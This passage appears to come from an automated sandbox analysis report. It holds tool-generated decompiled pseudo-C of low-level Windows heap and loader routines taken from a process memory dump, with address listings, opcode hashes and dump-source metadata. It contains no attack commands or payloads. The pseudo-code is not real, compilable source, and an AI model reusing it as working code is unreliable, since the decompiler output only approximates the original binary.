																	_t166 = _t166 ^  *(_t246 + 0x50);
																	__eflags = _t166;
																}
																_t161 = _t166 & 0x0000ffff;
															}
														} else {
															_t161 =  *((intOrPtr*)((_t248 >> 0x00000003 ^  *_t248 ^  *0x9d00a4 ^ _t246) + 0x10));
														}
														_t163 =  *(_t248 + (_t161 & 0x0000ffff) * 8 - 4);
													} else {
														_t163 = _t160 & 0x3f;
													}
												} else {
													_t163 =  *(_t248 + 4 + (_t160 & 0x3f) * 8) & 0x0000ffff;
												}
											} else {
												_t163 =  *(_t246 + 0x54) & 0x0000ffff ^  *(_t248 + 4) & 0x0000ffff;
											}
											_t164 = _t163 - _t196;
											_t243 =  *(_t248 + 7) & 0x00000080;
											__eflags = _t164 - 0x3f;
											if(__eflags >= 0) {
												__eflags = _t243;
												if(_t243 == 0) {
													__eflags =  *(_t246 + 0x4c);
													if( *(_t246 + 0x4c) == 0) {
														_t215 =  *_t248 & 0x0000ffff;
													} else {
														_t217 =  *_t248;
														__eflags =  *(_t246 + 0x4c) & _t217;
														if(( *(_t246 + 0x4c) & _t217) != 0) {
															_t217 = _t217 ^  *(_t246 + 0x50);
															__eflags = _t217;
														}
														_t215 = _t217 & 0x0000ffff;
													}
												} else {
													_t215 =  *((intOrPtr*)((_t248 >> 0x00000003 ^  *_t248 ^  *0x9d00a4 ^ _t246) + 0x10));
												}
												_t244 = _t243 | 0x0000003f;
												__eflags = _t244;
												 *(_t248 + 7) = _t244;
												 *(_t248 + (_t215 & 0x0000ffff) * 8 - 4) = _t164;
											} else {
												 *(_t248 + 7) = _t164 | _t243;
											}
										} else {
											_t177 = _a8 & 0x00000001;
											__eflags = _t177;
											_a12 = _t177;
											if(_t177 == 0) {
												__eflags =  *(_t246 + 0x44) & 0x00000001;
												if(__eflags == 0) {
													E008F22D0(__eflags,  *((intOrPtr*)(_t246 + 0xcc)));
												}
											}
											__eflags =  *(_t246 + 0x4c);
											if( *(_t246 + 0x4c) != 0) {
												 *_t248 =  *_t248 ^  *(_t246 + 0x50);
												__eflags =  *(_t248 + 3) - ( *(_t248 + 2) ^  *(_t248 + 1) ^  *_t248);
												if(__eflags != 0) {
													_push(0);
													_push(_t248);
													_push(_t246);
													E0099F8EE(0, _t246, _t248, __eflags);
												}
											}
											 *_t248 =  *_t248 - _v8;
											__eflags =  *(_t246 + 0x4c);
											if( *(_t246 + 0x4c) != 0) {
												 *(_t248 + 3) =  *(_t248 + 2) ^  *(_t248 + 1) ^  *_t248;
												 *_t248 =  *_t248 ^  *(_t246 + 0x50);
												__eflags =  *_t248;
											}
											__eflags = _a12;
											if(__eflags == 0) {
												__eflags =  *(_t246 + 0x44) & 0x00000001;
												if(__eflags == 0) {
													E008F2290( *((intOrPtr*)(_t246 + 0xcc)));
												}
											}
										}
										_t110 = _t248 + 8; // 0x0
										_t193 = _t110;
										goto L9;
									}
								}
								_t230 = _t210 & 0x3f;
								L26:
								_v8 = _t230 << 0x00000003 & 0x0000ffff;
								goto L30;
							}
							_t230 =  *(_t140 + 6) & 0x000000ff;
							goto L26;
						}
						L9:
						_t250 = _a16;
						_t237 = _a8 | 0x00000002;
						_t141 = E0090C85C(_t193, _t246, _a8 | 0x00000002, _t246, _t250, _t260, _t193, _t250);
						_a16 = _t141;
						if(_t141 != 0) {
							_t195 = _v12;
							if(_t195 == 0) {
								return _t141;
							}
							_t207 = _t195 - 0x00000001 & 0x0000ffff;
							__eflags = _t207 -  *0x9d7990; // 0x3
							if(__eflags >= 0) {
								_t208 = 0;
								__eflags = 0;
							} else {
								_t208 =  *((intOrPtr*)(0x96de08 + _t207 * 4));
							}
							 *_t208(_t246, 6, _t195 >> 0x10, _t141);
							return E00985955(_t246, _a8, _a16, _t250 - (_v8 & 0x0000ffff), _v8, _t195);
						}
						_t204 = _v12;
						_t251 = _t250 - (_v8 & 0x0000ffff);
						__eflags = _t204;
						if(__eflags != 0) {
							_t144 = _t204 - 0x00000001 & 0x0000ffff;
							__eflags = _t144 -  *0x9d7990; // 0x3
							if(__eflags >= 0) {
								_t145 = 0;
								__eflags = 0;
							} else {
								_t145 =  *((intOrPtr*)(0x96de08 + _t144 * 4));
							}
							 *_t145(_t246, 6, _t204 >> 0x10, _t193);
							_t147 = E00904680(_t246, _t246, 0, _t193);
							_t237 = _a8;
							_t204 = _t246;
							E00985955(_t246, _a8, _t193, _t147, _v8, _v12);
						}
						_t194 =  *[fs:0x18];
						_push(0xc0000017);
						 *((intOrPtr*)( *[fs:0x18] + 0xbf4)) = 0xc0000017;
						_t150 = E0090641D(__eflags);
						__eflags = _a8 & 0x00000004;
						 *((intOrPtr*)( *[fs:0x18] + 0x34)) = _t150;
						if((_a8 & 0x00000004) != 0) {
							_v84 = _v84 & 0x00000000;
							_v88 = _v88 & 0x00000000;
							_push( &_v92);
							_v92 = 0xc0000017;
							_v76 = 1;
							_v72 = _t251;
							_v80 = E009338D8;
							E009338D8(_t194, _t204, _t237, 0xc0000017, _t251);
						}
						goto L14;
					}
					_t13 = _t193 - 8; // -8
					_t192 = _t13;
					if( *((char*)(_t192 + 7)) == 5) {
						_t199 = ( *(_t192 + 6) & 0x000000ff) << 3;
						_t137 = _t192 - (( *(_t192 + 6) & 0x000000ff) << 3);
					}
					if(( *(_t137 + 7) & 0x0000003f) == 0) {
						_push(_t248);
						_push(_t248);
						_push(_t248);
						_push(_t137);
						_push(_t246);
						_push(8);
						goto L21;
					}
					goto L6;
				}
			}


















































                                                0x0090c7c5
                                                0x0090c7c9
                                                0x0090c7cc
                                                0x0090c7cf
                                                0x0090c7d4
                                                0x0095de65
                                                0x0095de66
                                                0x0095de71
                                                0x00932181
                                                0x00000000
                                                0x00932181
                                                0x0090c7da
                                                0x0090c7e4
                                                0x00000000
                                                0x0095de81
                                                0x0090c7ee
                                                0x0093218c
                                                0x0090c814
                                                0x0090c814
                                                0x00000000
                                                0x0090c7f4
                                                0x0090c7f7
                                                0x0095dea2
                                                0x0095dea3
                                                0x0095dea4
                                                0x0095dea5
                                                0x0095dea6
                                                0x0095dea7
                                                0x0095dea9
                                                0x0095dea9
                                                0x0090c816
                                                0x0090c818
                                                0x0095deb3
                                                0x0095dec6
                                                0x0095dec7
                                                0x0095ded2
                                                0x00000000
                                                0x0095ded2
                                                0x0090c81e
                                                0x0090c822
                                                0x0095deda
                                                0x0095dee1
                                                0x0095dee1
                                                0x0095dee6
                                                0x0095dee9
                                                0x00000000
                                                0x00000000
                                                0x0095deef
                                                0x0095def2
                                                0x0095def5
                                                0x0095df08
                                                0x0095df0b
                                                0x0095df16
                                                0x0095df16
                                                0x0095df16
                                                0x0095df1a
                                                0x0095df1a
                                                0x0095df1e
                                                0x0095df21
                                                0x0095df24
                                                0x0095df26
                                                0x00000000
                                                0x00000000
                                                0x0095df28
                                                0x0095df2c
                                                0x0095df2f
                                                0x0095df3f
                                                0x0095df3f
                                                0x0095df31
                                                0x0095df3a
                                                0x0095df3a
                                                0x0095df41
                                                0x0095df44
                                                0x0095df46
                                                0x0095df5f
                                                0x0095df5f
                                                0x0095df5f
                                                0x00000000
                                                0x0095df48
                                                0x0095df4b
                                                0x0095df4e
                                                0x0095df54
                                                0x00000000
                                                0x00000000
                                                0x0095df56
                                                0x0095df61
                                                0x0095df6b
                                                0x0095df6d
                                                0x00000000
                                                0x00000000
                                                0x0095df73
                                                0x0095df76
                                                0x0095df78
                                                0x0095dff6
                                                0x0095dff8
                                                0x0095e006
                                                0x0095e008
                                                0x0095e01c
                                                0x0095e01f
                                                0x0095e029
                                                0x0095e02b
                                                0x0095e044
                                                0x0095e048
                                                0x0095e059
                                                0x0095e04a
                                                0x0095e04a
                                                0x0095e04c
                                                0x0095e04f
                                                0x0095e051
                                                0x0095e051
                                                0x0095e051
                                                0x0095e054
                                                0x0095e054
                                                0x0095e02d
                                                0x0095e03e
                                                0x0095e03e
                                                0x0095e05f
                                                0x0095e021
                                                0x0095e024
                                                0x0095e024
                                                0x0095e00a
                                                0x0095e010
                                                0x0095e010
                                                0x0095dffa
                                                0x0095e002
                                                0x0095e002
                                                0x0095e066
                                                0x0095e068
                                                0x0095e06b
                                                0x0095e06e
                                                0x0095e077
                                                0x0095e079
                                                0x0095e092
                                                0x0095e096
                                                0x0095e0a7
                                                0x0095e098
                                                0x0095e098
                                                0x0095e09a
                                                0x0095e09d
                                                0x0095e09f
                                                0x0095e09f
                                                0x0095e09f
                                                0x0095e0a2
                                                0x0095e0a2
                                                0x0095e07b
                                                0x0095e08c
                                                0x0095e08c
                                                0x0095e0ad
                                                0x0095e0ad
                                                0x0095e0b0
                                                0x0095e0b3
                                                0x0095e070
                                                0x0095e072
                                                0x0095e072
                                                0x0095df7a
                                                0x0095df7d
                                                0x0095df7d
                                                0x0095df80
                                                0x0095df83
                                                0x0095df85
                                                0x0095df89
                                                0x0095df91
                                                0x0095df91
                                                0x0095df89
                                                0x0095df98
                                                0x0095df9b
                                                0x0095dfa0
                                                0x0095dfaa
                                                0x0095dfad
                                                0x0095dfaf
                                                0x0095dfb0
                                                0x0095dfb1
                                                0x0095dfb2
                                                0x0095dfb2
                                                0x0095dfad
                                                0x0095dfbb
                                                0x0095dfbe
                                                0x0095dfc1
                                                0x0095dfcb
                                                0x0095dfd1
                                                0x0095dfd1
                                                0x0095dfd1
                                                0x0095dfd3
                                                0x0095dfd6
                                                0x0095dfdc
                                                0x0095dfe0
                                                0x0095dfec
                                                0x0095dfec
                                                0x0095dfe0
                                                0x0095dfd6
                                                0x0095e0b7
                                                0x0095e0b7
                                                0x00000000
                                                0x0095e0b7
                                                0x0095df46
                                                0x0095df10
                                                0x0095defc
                                                0x0095df03
                                                0x00000000
                                                0x0095df03
                                                0x0095def7
                                                0x00000000
                                                0x0095def7
                                                0x0090c828
                                                0x0090c828
                                                0x0090c830
                                                0x0090c835
                                                0x0090c83a
                                                0x0090c83f
                                                0x0090c845
                                                0x0090c84a
                                                0x0090c854
                                                0x0090c854
                                                0x0095e0c2
                                                0x0095e0c5
                                                0x0095e0cb
                                                0x0095e0d6
                                                0x0095e0d6
                                                0x0095e0cd
                                                0x0095e0cd
                                                0x0095e0cd
                                                0x0095e0e2
                                                0x00000000
                                                0x0095e0f7
                                                0x00932149
                                                0x0093214c
                                                0x0093214e
                                                0x00932150
                                                0x0095e104
                                                0x0095e107
                                                0x0095e10d
                                                0x0095e118
                                                0x0095e118
                                                0x0095e10f
                                                0x0095e10f
                                                0x0095e10f
                                                0x0095e122
                                                0x0095e12e
                                                0x0095e133
                                                0x0095e138
                                                0x0095e13a
                                                0x0095e13a
                                                0x0093215c
                                                0x00932168
                                                0x00932169
                                                0x0093216f
                                                0x00932174
                                                0x00932178
                                                0x0093217b
                                                0x0095e144
                                                0x0095e148
                                                0x0095e14f
                                                0x0095e150
                                                0x0095e153
                                                0x0095e15a
                                                0x0095e15d
                                                0x0095e164
                                                0x0095e164
                                                0x00000000
                                                0x0093217b
                                                0x0090c7fd
                                                0x0090c7fd
                                                0x0090c804
                                                0x0095de8f
                                                0x0095de92
                                                0x0095de92
                                                0x0090c80e
                                                0x0095de99
                                                0x0095de9a
                                                0x0095de9b
                                                0x0095de9c
                                                0x0095de9d
                                                0x0095de9e
                                                0x00000000
                                                0x0095de9e
                                                0x00000000
                                                0x0090c80e

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: c68ac4d7456b6b7f6904f286e5e370a98ffdb06c4772dc737a4b951490ab0375
                                                • Instruction ID: b7afd3b456b331e409c0b34d4528c073530492868268f76883adf52af01293b0
                                                • Opcode Fuzzy Hash: c68ac4d7456b6b7f6904f286e5e370a98ffdb06c4772dc737a4b951490ab0375
                                                • Instruction Fuzzy Hash: 88C15A71509255EFDB38CF26C584BBABBF8EF40302F14441DEC868B581D379A949EB50
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 0091905A, Relevance: .3, Instructions: 283COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 90%
                                                			E0091905A(signed int __ecx, void* __edx, void* __esi, void* __eflags) {
				signed int _v8;
				char _v178;
				char _v180;
				void* _v188;
				void* _v196;
				short _v200;
				signed int _v202;
				short _v204;
				short _v206;
				char _v208;
				signed int _v212;
				signed int _v216;
				signed int _v220;
				signed int _v224;
				signed int _v228;
				signed int _v232;
				char* _v236;
				short _v238;
				char _v240;
				intOrPtr _v244;
				char _v248;
				void* __ebx;
				void* __edi;
				signed int _t117;
				signed int _t122;
				signed short _t123;
				void* _t125;
				signed int _t127;
				intOrPtr _t128;
				signed int _t130;
				intOrPtr _t132;
				intOrPtr _t133;
				intOrPtr _t134;
				signed int _t142;
				signed char _t151;
				signed int _t164;
				signed int _t165;
				void* _t191;
				void* _t192;
				void* _t195;
				short _t203;
				void* _t210;
				signed int _t211;
				signed int _t212;
				signed int _t219;
				void* _t220;
				signed int _t221;

				_t220 = __esi;
				_t210 = __edx;
				_t193 = __ecx;
				_t117 =  *0x9d2088; // 0x774fe2a0
				_v8 = _t117 ^ _t221;
				_v220 = _v220 | 0xffffffff;
				_v232 = _v232 | 0xffffffff;
				_t211 = 0;
				_v180 = 0;
				_v224 = 0;
				_v216 = 0;
				_v228 = 0;
				E008FDFC0( &_v178, 0, 0xa8);
				_t122 = E008F0DD4();
				_t123 =  *(__esi + 4) & 0x0000ffff;
				asm("sbb bl, bl");
				_t191 =  ~_t122 + 1;
				if(_t123 <= 0) {
					_t125 = E008F1424( &_v224);
					if(_t125 >= 0) {
						goto L2;
					} else {
						goto L29;
					}
					goto L34;
				} else {
					_v224 = _t123 & 0x0000ffff;
					L2:
					_t127 = E0091406E(_t220, _v224, _t211,  &_v232);
					if(_t127 == 0xc0000034 || _t127 == 0xc00000bb) {
						L34:
						_v212 = _v212 | 0xffffffff;
						_t128 = E00914148(2, 0x55);
						_v228 = _t128;
						if(_t128 != _t211) {
							_t193 = _v224 & 0x0000ffff;
							_t127 = E00913FDE( &_v248, _t128, _v224 & 0x0000ffff);
							if(_t127 == 0) {
								goto L10;
							}
							_t164 = E009153F2(_t220, _v244, 1,  &_v212);
							if(_t164 >= 0) {
								_t165 = _v212;
							} else {
								_t165 = _t164 | 0xffffffff;
							}
							_t203 = 0x31;
							_v208 = _t203;
							_v202 = _t165;
							_v206 = 0;
							_v204 = _v224;
							_v200 = 0;
							asm("stosd");
							asm("stosd");
							_t193 = 0 << 0x10;
							asm("stosd");
							asm("stosd");
							E0091988A(0 << 0x10, _t210, _t220,  &_v208, _v244);
							_t127 = E00919569(_t220,  &_v208, 0);
							if(_t127 < 0) {
								goto L10;
							} else {
								_t127 = ( *( *((intOrPtr*)(_t220 + 0x14)) + 6) & 0x0000ffff) - 1;
								goto L6;
							}
						}
						_t125 = 0xc0000017;
						goto L29;
					} else {
						if(_t127 < _t211) {
							L10:
							if(_t191 == 0) {
								_t130 = _t127 | 0xffffffff;
							} else {
								_t130 = _v220;
							}
							E00919263(_t193, _t220, _t130);
							_t132 =  *((intOrPtr*)(_t220 + 0x14));
							_t212 = 0;
							_v212 = 0;
							if(0 >=  *(_t132 + 6)) {
								L15:
								_t133 =  *((intOrPtr*)(_t220 + 0x14));
								_t195 = 0;
								_t210 = 0;
								if(0 >=  *(_t133 + 6)) {
									L23:
									_t134 =  *((intOrPtr*)(_t220 + 0x14));
									_t196 = 0;
									_t211 = 0;
									if(0 >=  *(_t134 + 6)) {
										L27:
										if(_v228 != 0) {
											E008FE025(_t196,  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x18] + 0x30)) + 0x18)), 0, _v228);
										}
										_t125 = 0;
										L29:
										return E008FE1B4(_t125, _t191, _v8 ^ _t221, _t210, _t211, _t220);
									}
									_t192 = 0;
									do {
										if(( *(_t192 +  *((intOrPtr*)(_t134 + 0xc))) & 0x00000004) != 0) {
											E0099AF73(_t220, _t211);
										}
										_t134 =  *((intOrPtr*)(_t220 + 0x14));
										_t196 =  *(_t134 + 6) & 0x0000ffff;
										_t211 = _t211 + 1;
										_t192 = _t192 + 0x1c;
									} while (_t211 < ( *(_t134 + 6) & 0x0000ffff));
									goto L27;
								} else {
									goto L16;
								}
								do {
									L16:
									_t142 =  *(_t195 +  *((intOrPtr*)(_t133 + 0xc))) & 0x0000ffff;
									if((_t142 & 0x00000001) != 0 && (_t142 & 0x00000020) != 0) {
										if((_t142 & 0x00001000) == 0) {
											_v216 = _v216 + 1;
										}
										if(_t191 != 0 && _t210 != _v220 && _v216 >  *((intOrPtr*)(_t220 + 0x48))) {
											 *( *((intOrPtr*)( *((intOrPtr*)(_t220 + 0x14)) + 0xc)) + _t195) =  *( *((intOrPtr*)( *((intOrPtr*)(_t220 + 0x14)) + 0xc)) + _t195) & 0x0000ffdf;
											 *( *((intOrPtr*)( *((intOrPtr*)(_t220 + 0x14)) + 0xc)) + _t195) =  *( *((intOrPtr*)( *((intOrPtr*)(_t220 + 0x14)) + 0xc)) + _t195) | 0x00008000;
										}
									}
									_t133 =  *((intOrPtr*)(_t220 + 0x14));
									_t210 = _t210 + 1;
									_t195 = _t195 + 0x1c;
								} while (_t210 < ( *(_t133 + 6) & 0x0000ffff));
								goto L23;
							} else {
								do {
									_t151 =  *(_t212 +  *((intOrPtr*)(_t132 + 0xc))) & 0x0000ffff;
									if((_t151 & 0x00000002) != 0) {
										if((_t151 & 0x00000020) != 0) {
											E0099B161(_t220, _v212);
											if(( *(_t212 +  *((intOrPtr*)( *((intOrPtr*)(_t220 + 0x14)) + 0xc))) & 0x00001000) == 0) {
												_v216 = _v216 + 1;
											}
											if(_t191 != 0 && _v212 != _v220 && _v216 >  *((intOrPtr*)(_t220 + 0x48))) {
												 *( *((intOrPtr*)( *((intOrPtr*)(_t220 + 0x14)) + 0xc)) + _t212) =  *( *((intOrPtr*)( *((intOrPtr*)(_t220 + 0x14)) + 0xc)) + _t212) & 0x0000ffdf;
												 *( *((intOrPtr*)( *((intOrPtr*)(_t220 + 0x14)) + 0xc)) + _t212) =  *( *((intOrPtr*)( *((intOrPtr*)(_t220 + 0x14)) + 0xc)) + _t212) | 0x00008000;
											}
										}
									}
									_t132 =  *((intOrPtr*)(_t220 + 0x14));
									_v212 = _v212 + 1;
									_t212 = _t212 + 0x1c;
								} while (_v212 < ( *(_t132 + 6) & 0x0000ffff));
								goto L15;
							}
						} else {
							_t127 = _v232;
							L6:
							_v220 = _t127;
							if(_t127 != 0xffffffff) {
								_t219 = _v220 * 0x1c;
								_v236 =  &_v180;
								_v238 = 0xaa;
								_t127 = E00917750(_t193, _t220,  *((intOrPtr*)( *((intOrPtr*)(_t220 + 0x14)) + 0xc)) + _t219,  &_v240);
								if(_t127 >= 0) {
									_t127 = E00917C8F(_t220, _v236);
									if(_t127 < 0) {
										 *( *((intOrPtr*)( *((intOrPtr*)(_t220 + 0x14)) + 0xc)) + _t219) =  *( *((intOrPtr*)( *((intOrPtr*)(_t220 + 0x14)) + 0xc)) + _t219) & 0x0000ffdf;
										_t127 =  *((intOrPtr*)( *((intOrPtr*)(_t220 + 0x14)) + 0xc)) + _t219;
										_t193 = 0x8000;
										 *_t127 =  *_t127 | 0x00008000;
									} else {
										_v216 = 1;
									}
								}
							}
							goto L10;
						}
					}
				}
			}


















































                                                0x0091905a
                                                0x0091905a
                                                0x0091905a
                                                0x00919065
                                                0x0091906c
                                                0x0091906f
                                                0x00919076
                                                0x0091907f
                                                0x00919088
                                                0x00919097
                                                0x0091909d
                                                0x009190a3
                                                0x009190a9
                                                0x009190b1
                                                0x009190b8
                                                0x009190be
                                                0x009190c0
                                                0x009190c5
                                                0x00961fd4
                                                0x0091924e
                                                0x00000000
                                                0x00919254
                                                0x00000000
                                                0x00919254
                                                0x00000000
                                                0x009190cb
                                                0x009190ce
                                                0x009190d4
                                                0x009190e3
                                                0x009190ed
                                                0x00961fde
                                                0x00961fde
                                                0x00961fe9
                                                0x00961fee
                                                0x00961ff6
                                                0x00962002
                                                0x00962012
                                                0x00962019
                                                0x00000000
                                                0x00000000
                                                0x0096202f
                                                0x00962036
                                                0x0096203d
                                                0x00962038
                                                0x00962038
                                                0x00962038
                                                0x00962045
                                                0x00962046
                                                0x0096204d
                                                0x00962056
                                                0x00962066
                                                0x00962070
                                                0x0096208a
                                                0x0096208b
                                                0x00962093
                                                0x0096209e
                                                0x0096209f
                                                0x009620a8
                                                0x009620b7
                                                0x009620be
                                                0x00000000
                                                0x009620c4
                                                0x009620cb
                                                0x00000000
                                                0x009620cb
                                                0x009620be
                                                0x00961ff8
                                                0x00000000
                                                0x009190fe
                                                0x00919100
                                                0x0091916d
                                                0x0091916f
                                                0x00919256
                                                0x00919175
                                                0x00919175
                                                0x00919175
                                                0x0091917d
                                                0x00919182
                                                0x00919185
                                                0x00919189
                                                0x00919193
                                                0x009191bc
                                                0x009191bc
                                                0x009191bf
                                                0x009191c1
                                                0x009191c7
                                                0x00919204
                                                0x00919204
                                                0x00919207
                                                0x00919209
                                                0x0091920f
                                                0x0091922f
                                                0x00919236
                                                0x009621c3
                                                0x009621c3
                                                0x0091923c
                                                0x0091923e
                                                0x0091924b
                                                0x0091924b
                                                0x00919211
                                                0x00919213
                                                0x0091921a
                                                0x009621a5
                                                0x009621a5
                                                0x00919220
                                                0x00919223
                                                0x00919227
                                                0x00919228
                                                0x0091922b
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x00000000
                                                0x009191c9
                                                0x009191c9
                                                0x009191cc
                                                0x009191d2
                                                0x009191dd
                                                0x009191df
                                                0x009191df
                                                0x009191e7
                                                0x0096218b
                                                0x0096219b
                                                0x0096219b
                                                0x009191e7
                                                0x009191f5
                                                0x009191fc
                                                0x009191fd
                                                0x00919200
                                                0x00000000
                                                0x00919195
                                                0x00919195
                                                0x00919198
                                                0x0091919e
                                                0x009620f8
                                                0x00962105
                                                0x00962119
                                                0x0096211b
                                                0x0096211b
                                                0x00962123
                                                0x00962157
                                                0x00962167
                                                0x00962167
                                                0x00962123
                                                0x009620f8
                                                0x009191a4
                                                0x009191ab
                                                0x009191b1
                                                0x009191b4
                                                0x00000000
                                                0x00919195
                                                0x00919102
                                                0x00919102
                                                0x00919109
                                                0x00919109
                                                0x00919112
                                                0x00919120
                                                0x00919123
                                                0x0091912e
                                                0x00919146
                                                0x0091914d
                                                0x00919156
                                                0x0091915d
                                                0x009620de
                                                0x009620e7
                                                0x009620e9
                                                0x009620ee
                                                0x00919163
                                                0x00919163
                                                0x00919163
                                                0x0091915d
                                                0x0091914d
                                                0x00000000
                                                0x00919112
                                                0x00919100
                                                0x009190ed

                                                Memory Dump Source
                                                • Source File: 00000007.00000002.2149474689.00000000008E0000.00000040.00000001.sdmp, Offset: 008D0000, based on PE: true
                                                • Associated: 00000007.00000002.2149468638.00000000008D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149692494.00000000009C0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149700219.00000000009D0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149713288.00000000009D4000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149723271.00000000009D7000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149730125.00000000009E0000.00000040.00000001.sdmp Download File
                                                • Associated: 00000007.00000002.2149841483.0000000000A40000.00000040.00000001.sdmp Download File
                                                Similarity
                                                • API ID:
                                                • String ID:
                                                • API String ID:
                                                • Opcode ID: 23905fe09d0ccb6966c2365ba8ce1cb83ae15b3d74a1d36428c1eb015f3d0e3c
                                                • Instruction ID: d871aa2c3335b1b5436bc0b527d37c5a545c69f32d421617f28e21cae2cc32b9
                                                • Opcode Fuzzy Hash: 23905fe09d0ccb6966c2365ba8ce1cb83ae15b3d74a1d36428c1eb015f3d0e3c
                                                • Instruction Fuzzy Hash: 29B19C30A046599BEB30CF68CC54BEAB3F9EF45710F05459AE94AEB291D7349DC4CB21
                                                Uniqueness

                                                Uniqueness Score: -1.00%

                                                Function 008FE2E9, Relevance: .3, Instructions: 280COMMONCrypto
                                                Download Yara Rule
                                                C-Code - Quality: 89%
                                                			E008FE2E9(void* __ebx, signed short* __ecx, intOrPtr __edx, void* __edi, void* __esi, void* __eflags) {
				signed int _t340;
				signed int _t343;
				signed int _t344;
				signed int _t345;
				signed int _t348;
				signed int _t349;
				signed int _t350;
				signed int* _t351;
				signed int _t354;
				void* _t355;
				signed int _t357;
				signed int _t358;
				void* _t359;
				signed int _t361;
				signed int _t362;
				signed int _t363;
				signed int _t364;
				signed int _t371;
				signed int* _t378;
				signed int _t379;
				signed int _t380;
				signed int _t394;
				signed int _t401;
				signed int _t405;
				unsigned int _t409;
				signed int _t411;
				signed int _t415;
				signed int _t418;
				signed int _t425;
				signed int _t427;
				signed int _t435;
				signed int _t436;
				signed int _t437;
				signed int _t444;
				signed int* _t451;
				signed int _t452;
				signed int _t453;
				signed int _t466;
				void* _t467;
				signed char _t472;
				signed int _t478;
				signed int _t483;
				signed int* _t487;
				signed int _t496;
				signed int _t501;
				signed int* _t505;
				intOrPtr _t506;
				signed int _t509;
				signed int _t516;
				signed int _t517;
				signed int _t518;
				signed char _t536;
				signed int _t537;
				signed int _t555;
				intOrPtr _t562;
				signed int _t566;
				signed char _t568;
				signed int _t571;
				signed int _t574;
				signed char _t576;
				signed int* _t577;
				signed int _t578;
				unsigned int _t579;
				intOrPtr _t582;
				signed int _t585;
				signed char _t586;
				signed char _t587;
				signed int _t592;
				signed char* _t593;
				signed char _t594;
				signed short* _t602;
				void* _t606;
				signed char* _t616;
				signed char _t617;
				signed char _t618;
				signed char _t621;
				signed int _t626;
				signed char* _t627;
				signed char _t628;
				signed int _t632;
				unsigned int* _t635;
				signed int _t636;
				intOrPtr _t639;
				signed int _t644;
				intOrPtr _t651;
				signed int _t653;
				signed int _t654;
				signed int _t655;
				signed int _t657;
				signed char* _t658;
				signed int _t659;
				signed int _t661;
				signed int _t663;
				signed int _t668;
				signed int _t670;
				signed int _t671;
				void* _t672;
				signed int _t674;
				signed char _t675;
				signed int _t677;
				signed int _t678;
				signed int _t679;
				signed char _t682;
				signed int _t686;
				signed char _t687;
				signed int _t688;
				void* _t689;
				signed int _t691;
				signed char _t692;
				signed int _t698;
				signed short* _t705;
				signed int _t706;
				signed int _t709;
				void* _t714;
				void* _t719;
				signed int _t723;
				signed int _t724;
				signed int _t725;
				void* _t726;
				void* _t729;
				void* _t733;
				signed int _t737;
				unsigned int _t740;
				signed int _t747;
				void* _t748;
				signed int _t750;
				signed int _t751;
				signed int _t752;
				signed int _t753;
				signed int _t756;
				intOrPtr _t757;
				intOrPtr _t759;
				signed int _t760;
				signed int _t761;
				void* _t765;

				_push(0x64);
				_push(0x8fd348);
				E008FDF5C(__ebx, __edi, __esi);
				 *((intOrPtr*)(_t765 - 0x3c)) = __edx;
				_t705 = __ecx;
				 *(_t765 - 0x28) = __ecx;
				_t747 = __ecx - 0x110 + ( *(__ecx + 2) & 0x000000ff) * 4;
				 *(_t765 - 0x2c) = _t747;
				if(( *(__ecx + 3) & 0x00000001) != 0) {
					_t516 =  *((intOrPtr*)( *[fs:0x18] + 0xfa8)) - 1;
					__eflags = _t516;
					 *(_t765 - 0x44) = _t516;
					if(_t516 < 0) {
						 *0x9d02e0 = 0xffffffff;
						 *0x9d02e4 = 0xffffffff;
						L155:
						_t340 = E00935485();
						_t651 =  *[fs:0x18];
						_t227 = _t340 + 1; // 0x1
						_t562 = _t227;
						__eflags = _t562 -  *((intOrPtr*)(_t651 + 0xfa8));
						if(_t562 !=  *((intOrPtr*)(_t651 + 0xfa8))) {
							asm("lock xadd [edx], ebx");
						}
						 *((intOrPtr*)( *[fs:0x18] + 0xfa8)) = _t562;
						_t516 = _t340;
						L153:
						 *(_t765 - 0x34) = _t516;
						goto L2;
					}
					_t506 =  *[fs:0x18];
					__eflags =  *((intOrPtr*)(0x9d02f8 + _t516 * 4)) -  *((intOrPtr*)(_t506 + 0x24));
					if( *((intOrPtr*)(0x9d02f8 + _t516 * 4)) !=  *((intOrPtr*)(_t506 + 0x24))) {
						goto L155;
					}
					_t509 = E009047C0(1, _t516, 0);
					_t644 =  *0x9d02e0; // 0x0
					_t761 =  *0x9d02e4; // 0x0
					__eflags = _t644 & _t509 | _t761 & 0;
					if((_t644 & _t509 | _t761 & 0) != 0) {
						asm("lock cmpxchg8b [esi]");
						_t516 =  *(_t765 - 0x44);
					}
					_t747 =  *(_t765 - 0x2c);
					goto L153;
				} else {
					 *(_t765 - 0x34) =  *(_t765 - 0x34) & 0x00000000;
					L2:
					_t343 =  *(_t765 - 0x34) * 0x3418 + _t747 + 0x310;
					 *(_t765 - 0x44) = _t343;
					_t653 = _t343 + 0x18 + ( *(_t705 + 2) & 0x000000ff) * 0x68;
					 *(_t765 - 0x20) = _t653;
					_t344 =  *_t653;
					 *(_t765 - 0x30) = _t344;
					if(_t344 == 0) {
						while(1) {
							L59:
							_t517 =  *(_t765 - 0x20);
							_t345 =  *(_t517 + 4);
